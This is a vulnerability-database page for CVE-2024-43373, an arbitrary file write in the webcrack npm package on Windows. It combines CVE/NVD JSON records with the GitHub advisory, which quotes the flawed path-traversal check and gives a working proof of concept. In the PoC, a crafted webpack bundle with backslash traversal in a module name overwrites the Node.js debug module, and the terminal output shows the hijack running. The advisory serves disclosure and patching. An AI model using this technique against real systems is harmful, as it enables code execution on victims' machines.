Vulnerability-Lookup

CVE-2024-43373 (GCVE-0-2024-43373)

Vulnerability from cvelistv5 – Published: 2024-08-15 14:31 – Updated: 2024-08-15 15:55

Title

webcrack has an Arbitrary File Write Vulnerability on Windows when Parsing and Saving a Malicious Bundle

Summary

webcrack is a tool for reverse engineering javascript. An arbitrary file write vulnerability exists in the webcrack module when processing specifically crafted malicious code on Windows systems. This vulnerability is triggered when using the unpack bundles feature in conjunction with the saving feature. If a module name includes a path traversal sequence with Windows path separators, an attacker can exploit this to overwrite files on the host system. This vulnerability allows an attacker to write arbitrary `.js` files to the host system, which can be leveraged to hijack legitimate Node.js modules to gain arbitrary code execution. This vulnerability has been patched in version 2.14.1.

Severity ?

7.7 (High)


                        
                          CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L

CWE

CWE-20 - Improper Input Validation
CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/j4k0xb/webcrack/security/advis…	x_refsource_CONFIRM
	https://github.com/j4k0xb/webcrack/commit/4bc5c6f…	x_refsource_MISC
	https://github.com/j4k0xb/webcrack/blob/241f9469e…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	j4k0xb	webcrack	Affected: <= 2.14.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:j4k0xb:webcrack:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "webcrack",
            "vendor": "j4k0xb",
            "versions": [
              {
                "lessThanOrEqual": "2.14.0",
                "status": "affected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-43373",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-08-15T15:53:16.977094Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-08-15T15:55:26.684Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "webcrack",
          "vendor": "j4k0xb",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 2.14.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "webcrack is a tool for reverse engineering javascript. An arbitrary file write vulnerability exists in the webcrack module when processing specifically crafted malicious code on Windows systems. This vulnerability is triggered when using the unpack bundles feature in conjunction with the saving feature. If a module name includes a path traversal sequence with Windows path separators, an attacker can exploit this to overwrite files on the host system. This vulnerability allows an attacker to write arbitrary `.js` files to the host system, which can be leveraged to hijack legitimate Node.js modules to gain arbitrary code execution. This vulnerability has been patched in version 2.14.1."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "LOW",
            "baseScore": 7.7,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-20",
              "description": "CWE-20: Improper Input Validation",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-08-15T14:31:34.120Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/j4k0xb/webcrack/security/advisories/GHSA-ccqh-278p-xq6w",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/j4k0xb/webcrack/security/advisories/GHSA-ccqh-278p-xq6w"
        },
        {
          "name": "https://github.com/j4k0xb/webcrack/commit/4bc5c6f353012ee7edc2cb39d01a728ab7426999",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/j4k0xb/webcrack/commit/4bc5c6f353012ee7edc2cb39d01a728ab7426999"
        },
        {
          "name": "https://github.com/j4k0xb/webcrack/blob/241f9469e6401f3dabc6373233d85a5e76966b54/packages/webcrack/src/unpack/bundle.ts#L79",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/j4k0xb/webcrack/blob/241f9469e6401f3dabc6373233d85a5e76966b54/packages/webcrack/src/unpack/bundle.ts#L79"
        }
      ],
      "source": {
        "advisory": "GHSA-ccqh-278p-xq6w",
        "discovery": "UNKNOWN"
      },
      "title": "webcrack has an Arbitrary File Write Vulnerability on Windows when Parsing and Saving a Malicious Bundle"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2024-43373",
    "datePublished": "2024-08-15T14:31:34.120Z",
    "dateReserved": "2024-08-09T14:23:55.513Z",
    "dateUpdated": "2024-08-15T15:55:26.684Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2024-43373",
      "date": "2026-05-08",
      "epss": "0.00209",
      "percentile": "0.43027"
    },
    "fkie_nvd": {
      "configurations": "[{\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:j4k0xb:webcrack:*:*:*:*:*:node.js:*:*\", \"versionEndExcluding\": \"2.14.1\", \"matchCriteriaId\": \"C997713B-AFD5-4B9F-A1B4-F93649F10B43\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": false, \"criteria\": \"cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"A2572D17-1DE6-457B-99CC-64AFD54487EA\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"webcrack is a tool for reverse engineering javascript. An arbitrary file write vulnerability exists in the webcrack module when processing specifically crafted malicious code on Windows systems. This vulnerability is triggered when using the unpack bundles feature in conjunction with the saving feature. If a module name includes a path traversal sequence with Windows path separators, an attacker can exploit this to overwrite files on the host system. This vulnerability allows an attacker to write arbitrary `.js` files to the host system, which can be leveraged to hijack legitimate Node.js modules to gain arbitrary code execution. This vulnerability has been patched in version 2.14.1.\"}, {\"lang\": \"es\", \"value\": \"webcrack es una herramienta para realizar ingenier\\u00eda inversa en javascript. Existe una vulnerabilidad de escritura de archivos arbitraria en el m\\u00f3dulo webcrack cuando se procesa c\\u00f3digo malicioso espec\\u00edficamente manipulado en sistemas Windows. Esta vulnerabilidad se activa cuando se utiliza la funci\\u00f3n de descomprimir paquetes junto con la funci\\u00f3n de guardar. Si el nombre de un m\\u00f3dulo incluye una secuencia de path traversal con separadores de ruta de Windows, un atacante puede aprovechar esto para sobrescribir archivos en el sistema host. Esta vulnerabilidad permite a un atacante escribir archivos `.js` arbitrarios en el sistema host, que pueden aprovecharse para secuestrar m\\u00f3dulos Node.js leg\\u00edtimos y obtener la ejecuci\\u00f3n de c\\u00f3digo arbitrario. Esta vulnerabilidad ha sido parcheada en la versi\\u00f3n 2.14.1.\"}]",
      "id": "CVE-2024-43373",
      "lastModified": "2024-08-16T21:46:08.440",
      "metrics": "{\"cvssMetricV31\": [{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L\", \"baseScore\": 7.7, \"baseSeverity\": \"HIGH\", \"attackVector\": \"LOCAL\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"REQUIRED\", \"scope\": \"CHANGED\", \"confidentialityImpact\": \"LOW\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"LOW\"}, \"exploitabilityScore\": 1.8, \"impactScore\": 5.3}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\", \"baseScore\": 7.8, \"baseSeverity\": \"HIGH\", \"attackVector\": \"LOCAL\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"REQUIRED\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 1.8, \"impactScore\": 5.9}]}",
      "published": "2024-08-15T15:15:21.217",
      "references": "[{\"url\": \"https://github.com/j4k0xb/webcrack/blob/241f9469e6401f3dabc6373233d85a5e76966b54/packages/webcrack/src/unpack/bundle.ts#L79\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Product\"]}, {\"url\": \"https://github.com/j4k0xb/webcrack/commit/4bc5c6f353012ee7edc2cb39d01a728ab7426999\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/j4k0xb/webcrack/security/advisories/GHSA-ccqh-278p-xq6w\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Exploit\", \"Vendor Advisory\"]}]",
      "sourceIdentifier": "security-advisories@github.com",
      "vulnStatus": "Analyzed",
      "weaknesses": "[{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-20\"}, {\"lang\": \"en\", \"value\": \"CWE-22\"}]}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-22\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2024-43373\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-08-15T15:15:21.217\",\"lastModified\":\"2024-08-16T21:46:08.440\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"webcrack is a tool for reverse engineering javascript. An arbitrary file write vulnerability exists in the webcrack module when processing specifically crafted malicious code on Windows systems. This vulnerability is triggered when using the unpack bundles feature in conjunction with the saving feature. If a module name includes a path traversal sequence with Windows path separators, an attacker can exploit this to overwrite files on the host system. This vulnerability allows an attacker to write arbitrary `.js` files to the host system, which can be leveraged to hijack legitimate Node.js modules to gain arbitrary code execution. This vulnerability has been patched in version 2.14.1.\"},{\"lang\":\"es\",\"value\":\"webcrack es una herramienta para realizar ingenier\u00eda inversa en javascript. Existe una vulnerabilidad de escritura de archivos arbitraria en el m\u00f3dulo webcrack cuando se procesa c\u00f3digo malicioso espec\u00edficamente manipulado en sistemas Windows. Esta vulnerabilidad se activa cuando se utiliza la funci\u00f3n de descomprimir paquetes junto con la funci\u00f3n de guardar. Si el nombre de un m\u00f3dulo incluye una secuencia de path traversal con separadores de ruta de Windows, un atacante puede aprovechar esto para sobrescribir archivos en el sistema host. Esta vulnerabilidad permite a un atacante escribir archivos `.js` arbitrarios en el sistema host, que pueden aprovecharse para secuestrar m\u00f3dulos Node.js leg\u00edtimos y obtener la ejecuci\u00f3n de c\u00f3digo arbitrario. Esta vulnerabilidad ha sido parcheada en la versi\u00f3n 2.14.1.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L\",\"baseScore\":7.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":1.8,\"impactScore\":5.3},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\",\"baseScore\":7.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-20\"},{\"lang\":\"en\",\"value\":\"CWE-22\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"configurations\":[{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:j4k0xb:webcrack:*:*:*:*:*:node.js:*:*\",\"versionEndExcluding\":\"2.14.1\",\"matchCriteriaId\":\"C997713B-AFD5-4B9F-A1B4-F93649F10B43\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A2572D17-1DE6-457B-99CC-64AFD54487EA\"}]}]}],\"references\":[{\"url\":\"https://github.com/j4k0xb/webcrack/blob/241f9469e6401f3dabc6373233d85a5e76966b54/packages/webcrack/src/unpack/bundle.ts#L79\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/j4k0xb/webcrack/commit/4bc5c6f353012ee7edc2cb39d01a728ab7426999\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/j4k0xb/webcrack/security/advisories/GHSA-ccqh-278p-xq6w\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-43373\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-08-15T15:53:16.977094Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:j4k0xb:webcrack:*:*:*:*:*:*:*:*\"], \"vendor\": \"j4k0xb\", \"product\": \"webcrack\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"versionType\": \"custom\", \"lessThanOrEqual\": \"2.14.0\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-08-15T15:55:18.633Z\"}}], \"cna\": {\"title\": \"webcrack has an Arbitrary File Write Vulnerability on Windows when Parsing and Saving a Malicious Bundle\", \"source\": {\"advisory\": \"GHSA-ccqh-278p-xq6w\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 7.7, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"LOW\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"j4k0xb\", \"product\": \"webcrack\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 2.14.0\"}]}], \"references\": [{\"url\": \"https://github.com/j4k0xb/webcrack/security/advisories/GHSA-ccqh-278p-xq6w\", \"name\": \"https://github.com/j4k0xb/webcrack/security/advisories/GHSA-ccqh-278p-xq6w\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/j4k0xb/webcrack/commit/4bc5c6f353012ee7edc2cb39d01a728ab7426999\", \"name\": \"https://github.com/j4k0xb/webcrack/commit/4bc5c6f353012ee7edc2cb39d01a728ab7426999\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/j4k0xb/webcrack/blob/241f9469e6401f3dabc6373233d85a5e76966b54/packages/webcrack/src/unpack/bundle.ts#L79\", \"name\": \"https://github.com/j4k0xb/webcrack/blob/241f9469e6401f3dabc6373233d85a5e76966b54/packages/webcrack/src/unpack/bundle.ts#L79\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"webcrack is a tool for reverse engineering javascript. An arbitrary file write vulnerability exists in the webcrack module when processing specifically crafted malicious code on Windows systems. This vulnerability is triggered when using the unpack bundles feature in conjunction with the saving feature. If a module name includes a path traversal sequence with Windows path separators, an attacker can exploit this to overwrite files on the host system. This vulnerability allows an attacker to write arbitrary `.js` files to the host system, which can be leveraged to hijack legitimate Node.js modules to gain arbitrary code execution. This vulnerability has been patched in version 2.14.1.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-20\", \"description\": \"CWE-20: Improper Input Validation\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2024-08-15T14:31:34.120Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2024-43373\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-08-15T15:55:26.684Z\", \"dateReserved\": \"2024-08-09T14:23:55.513Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2024-08-15T14:31:34.120Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

GHSA-CCQH-278P-XQ6W

Vulnerability from github – Published: 2024-08-14 18:01 – Updated: 2024-11-18 16:27

Summary

webcrack has an Arbitrary File Write Vulnerability on Windows when Parsing and Saving a Malicious Bundle

Details

Summary

An arbitrary file write vulnerability exists in the webcrack module when processing specifically crafted malicious code on Windows systems. This vulnerability is triggered when using the unpack bundles feature in conjunction with the saving feature. If a module name includes a path traversal sequence with Windows path separators, an attacker can exploit this to overwrite files on the host system.

Details

Source: packages/webcrack/src/unpack/bundle.ts#L79

import { posix } from 'node:path';
import type { Module } from './module';

// eslint-disable-next-line @typescript-eslint/unbound-method
const { dirname, join, normalize } = posix;

/* ... snip ... */

const modulePath = normalize(join(path, module.path));
if (!modulePath.startsWith(path)) {
    throw new Error(`detected path traversal: ${module.path}`);
}
await mkdir(dirname(modulePath), {
    recursive: true
});
await writeFile(modulePath, module.code, 'utf8');

In this code, the application explicitly relies on the POSIX version of path utilities (dirname, join, normalize) from Node.js. However, the vulnerability arises because the POSIX version of the normalize function does not recognize \ as a path separator. As a result, on Windows systems, the path traversal check fails, allowing an attacker to write files to unintended locations.

PoC

The following proof of concept demonstrates how this vulnerability can be exploited to overwrite and hijack the debug module in Node.js:

Malicious Script (what.js):

(function (e) {
    var n = {};
    function o(r) {
      if (n[r]) {
        return n[r].exports;
      }
      var a = (n[r] = {
        i: r,
        l: false,
        exports: {},
      });
      e[r].call(a.exports, a, a.exports, o);
      a.l = true;
      return a.exports;
    }
    o.p = '';
    o((o.s = 386));
  })({
    './\\..\\node_modules\\debug\\src\\index': function (e, t, n) {
        module.exports = () => console.log("pwned")
    },
  });

Webcrack Script (index.js):

import fs from 'fs';
import { webcrack } from 'webcrack';

const input = fs.readFileSync('what.js', 'utf8');

const result = await webcrack(input);
console.log(result.code);
console.log(result.bundle);
await result.save('output-dir');

Execution: Running the above script with node index.js twice results in the following output being printed to the terminal:

PS C:\Webcrack> node .\index.js
Debugger attached.
(function (e) {
  var n = {};
  function o(r) {
    if (n[r]) {
      return n[r].exports;
    }
    var a = n[r] = {
      i: r,
      l: false,
      exports: {}
    };
    e[r].call(a.exports, a, a.exports, o);
    a.l = true;
    return a.exports;
  }
  o.p = "";
  o(o.s = 386);
})({
  "./\\..\\node_modules\\debug\\src\\index": function (e, t, n) {
    module.exports = () => console.log("pwned");
  }
});
WebpackBundle {
  type: 'webpack',
  entryId: '386',
  modules: Map(1) {
    './\\..\\node_modules\\debug\\src\\index' => WebpackModule {
      id: './\\..\\node_modules\\debug\\src\\index',
      isEntry: false,
      path: '././\\..\\node_modules\\debug\\src\\index.js',
      ast: [Object]
    }
  }
}
Waiting for the debugger to disconnect...
PS C:\Webcrack> node .\index.js
Debugger attached.
pwned
pwned
pwned
pwned
pwned
pwned
pwned
Waiting for the debugger to disconnect...
file:///C:/Webcrack/node_modules/webcrack/dist/index.js:444
  if (options.log) logger(`${name}: started`);
                   ^

TypeError: logger is not a function
    at applyTransforms (file:///C:/Webcrack/node_modules/webcrack/dist/index.js:444:20)
    at Array.<anonymous> (file:///C:/Webcrack/node_modules/webcrack/dist/index.js:4259:7)
    at webcrack (file:///C:/Webcrack/node_modules/webcrack/dist/index.js:4292:20)
    at async file:///C:/Webcrack/index.js:6:16

Node.js v18.16.0

This demonstrates that the debug module was successfully overwritten and hijacked to print pwned to the console, confirming the arbitrary file write vulnerability has lead to code execution.

Impact

This vulnerability allows an attacker to write arbitrary .js files to the host system, which can be leveraged to hijack legitimate Node.js modules to gain arbitrary code execution.

Severity ?

7.7 (High)


                  
                    CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L

6.2 (Medium)


                  
                    CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:H/SA:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.14.0"
      },
      "package": {
        "ecosystem": "npm",
        "name": "webcrack"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.14.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-43373"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-08-14T18:01:06Z",
    "nvd_published_at": "2024-08-15T15:15:21Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nAn arbitrary file write vulnerability exists in the webcrack module when processing specifically crafted malicious code on Windows systems. This vulnerability is triggered when using the unpack bundles feature in conjunction with the saving feature. If a module name includes a path traversal sequence with Windows path separators, an attacker can exploit this to overwrite files on the host system.\n\n### Details\n\nSource: [packages/webcrack/src/unpack/bundle.ts#L79](https://github.com/j4k0xb/webcrack/blob/241f9469e6401f3dabc6373233d85a5e76966b54/packages/webcrack/src/unpack/bundle.ts#L79)\n```ts\nimport { posix } from \u0027node:path\u0027;\nimport type { Module } from \u0027./module\u0027;\n\n// eslint-disable-next-line @typescript-eslint/unbound-method\nconst { dirname, join, normalize } = posix;\n\n/* ... snip ... */\n\nconst modulePath = normalize(join(path, module.path));\nif (!modulePath.startsWith(path)) {\n    throw new Error(`detected path traversal: ${module.path}`);\n}\nawait mkdir(dirname(modulePath), {\n    recursive: true\n});\nawait writeFile(modulePath, module.code, \u0027utf8\u0027);\n```\n\nIn this code, the application explicitly relies on the POSIX version of path utilities (`dirname`, `join`, `normalize`) from Node.js. However, the vulnerability arises because the POSIX version of the `normalize` function does not recognize `\\` as a path separator. As a result, on Windows systems, the path traversal check fails, allowing an attacker to write files to unintended locations.\n\n### PoC\nThe following proof of concept demonstrates how this vulnerability can be exploited to overwrite and hijack the `debug` module in Node.js:\n\n**Malicious Script (what.js):**\n\n```js\n(function (e) {\n    var n = {};\n    function o(r) {\n      if (n[r]) {\n        return n[r].exports;\n      }\n      var a = (n[r] = {\n        i: r,\n        l: false,\n        exports: {},\n      });\n      e[r].call(a.exports, a, a.exports, o);\n      a.l = true;\n      return a.exports;\n    }\n    o.p = \u0027\u0027;\n    o((o.s = 386));\n  })({\n    \u0027./\\\\..\\\\node_modules\\\\debug\\\\src\\\\index\u0027: function (e, t, n) {\n        module.exports = () =\u003e console.log(\"pwned\")\n    },\n  });\n```\n\n**Webcrack Script (index.js):**\n\n```js\nimport fs from \u0027fs\u0027;\nimport { webcrack } from \u0027webcrack\u0027;\n\nconst input = fs.readFileSync(\u0027what.js\u0027, \u0027utf8\u0027);\n\nconst result = await webcrack(input);\nconsole.log(result.code);\nconsole.log(result.bundle);\nawait result.save(\u0027output-dir\u0027);\n```\n\n**Execution:**\nRunning the above script with `node index.js` twice results in the following output being printed to the terminal:\n\n```\nPS C:\\Webcrack\u003e node .\\index.js\nDebugger attached.\n(function (e) {\n  var n = {};\n  function o(r) {\n    if (n[r]) {\n      return n[r].exports;\n    }\n    var a = n[r] = {\n      i: r,\n      l: false,\n      exports: {}\n    };\n    e[r].call(a.exports, a, a.exports, o);\n    a.l = true;\n    return a.exports;\n  }\n  o.p = \"\";\n  o(o.s = 386);\n})({\n  \"./\\\\..\\\\node_modules\\\\debug\\\\src\\\\index\": function (e, t, n) {\n    module.exports = () =\u003e console.log(\"pwned\");\n  }\n});\nWebpackBundle {\n  type: \u0027webpack\u0027,\n  entryId: \u0027386\u0027,\n  modules: Map(1) {\n    \u0027./\\\\..\\\\node_modules\\\\debug\\\\src\\\\index\u0027 =\u003e WebpackModule {\n      id: \u0027./\\\\..\\\\node_modules\\\\debug\\\\src\\\\index\u0027,\n      isEntry: false,\n      path: \u0027././\\\\..\\\\node_modules\\\\debug\\\\src\\\\index.js\u0027,\n      ast: [Object]\n    }\n  }\n}\nWaiting for the debugger to disconnect...\nPS C:\\Webcrack\u003e node .\\index.js\nDebugger attached.\npwned\npwned\npwned\npwned\npwned\npwned\npwned\nWaiting for the debugger to disconnect...\nfile:///C:/Webcrack/node_modules/webcrack/dist/index.js:444\n  if (options.log) logger(`${name}: started`);\n                   ^\n\nTypeError: logger is not a function\n    at applyTransforms (file:///C:/Webcrack/node_modules/webcrack/dist/index.js:444:20)\n    at Array.\u003canonymous\u003e (file:///C:/Webcrack/node_modules/webcrack/dist/index.js:4259:7)\n    at webcrack (file:///C:/Webcrack/node_modules/webcrack/dist/index.js:4292:20)\n    at async file:///C:/Webcrack/index.js:6:16\n\nNode.js v18.16.0\n```\n\nThis demonstrates that the debug module was successfully overwritten and hijacked to print `pwned` to the console, confirming the arbitrary file write vulnerability has lead to code execution.\n\n### Impact\nThis vulnerability allows an attacker to write arbitrary `.js` files to the host system, which can be leveraged to hijack legitimate Node.js modules to gain arbitrary code execution.\n",
  "id": "GHSA-ccqh-278p-xq6w",
  "modified": "2024-11-18T16:27:04Z",
  "published": "2024-08-14T18:01:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/j4k0xb/webcrack/security/advisories/GHSA-ccqh-278p-xq6w"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43373"
    },
    {
      "type": "WEB",
      "url": "https://github.com/j4k0xb/webcrack/commit/4bc5c6f353012ee7edc2cb39d01a728ab7426999"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/j4k0xb/webcrack"
    },
    {
      "type": "WEB",
      "url": "https://github.com/j4k0xb/webcrack/blob/241f9469e6401f3dabc6373233d85a5e76966b54/packages/webcrack/src/unpack/bundle.ts#L79"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:H/SA:L",
      "type": "CVSS_V4"
    }
  ],
  "summary": "webcrack has an Arbitrary File Write Vulnerability on Windows when Parsing and Saving a Malicious Bundle"
}

FKIE_CVE-2024-43373

Vulnerability from fkie_nvd - Published: 2024-08-15 15:15 - Updated: 2024-08-16 21:46

Severity ?

7.7 (High) - CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L
7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/j4k0xb/webcrack/blob/241f9469e6401f3dabc6373233d85a5e76966b54/packages/webcrack/src/unpack/bundle.ts#L79	Product
